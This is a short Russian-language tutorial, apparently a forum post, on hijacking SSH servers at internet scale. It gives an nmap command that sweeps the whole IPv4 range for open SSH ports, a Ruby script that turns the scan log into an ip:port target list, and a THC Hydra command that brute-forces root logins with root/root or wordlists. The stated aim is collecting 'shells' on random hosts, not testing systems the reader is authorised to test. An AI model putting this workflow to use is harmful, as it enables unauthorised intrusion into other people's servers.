nmap + THC Hydra
Код:
nmap -sS -p22 --open -oN ~/ssh.nmap_out 0.0.0.0/0
-p22 - порт, как можно заметить, перечисление через ','(запятую 22,222,2759 и тд) или диапазоны через '-'(тире 22-220 порты с 22 по 220)
диапозоны не практично для шеллов использовать, т.к. там либо совсем кастомный порт стоит(38593, например) и скорее всего пароль что не подберешь. в твоем случае это будут 22, 222, 2222, 22222, 220, 2200 и тд, основной посыл ясен.
0.0.0.0/0 - весь рейндж ип4. сканить будет долго, так что выбирай какие-то более осмысленные диапозоны для сканирования. можно указывать битовую маску или тире.
-oN ~/ssh.nmap_out - аутпут нормал, обычный лог(как программа в терминал выведет), далее путь сохранения.
-sS - тип сканирования, tcp sync scan. за подробносятми в ман(вообще реккомендую его хотя бы по диагонали пролистать, меньше вопросов будет)
потом лог нужно обработать - составить список целей в формате
ip : port
я использовал маленькую программу на руби для этого :
Код:
#/bin/ruby
#format nmap out to ip:port
f = File.open("#{ARGV[0]}", 'r')
out=""
ip=""
f.each_line do |l|
if l.include? "Nmap scan"
ip = l.scan(/\d+.\d+.\d+.\d+/).last
end
if l.include? " open"
port=l.split "/"
out << "#{ip}:#{port[0]}\n"
end
end
File.open("#{ARGV[0]}.out", 'w').puts out
сохранит в туже директорию фаил с таким же именем, на конце будет '.out'
потом гидру запускаешь
Код:
hydra -l root -p root -M /path_to_your_targerts_file -o ~/hydra.log ssh
будет производить атаку со связкой root/root. можно указать ключи -L и -P для фаилов-списков логинов\паролей.
также стоит посмотреть на количество потоков-задач, за этим загляни в ман по софту
в целом ничего сложного там нет. но и имо, ничего интересного на на таких шеллах не найдешь, хотя, кто знает. удачи!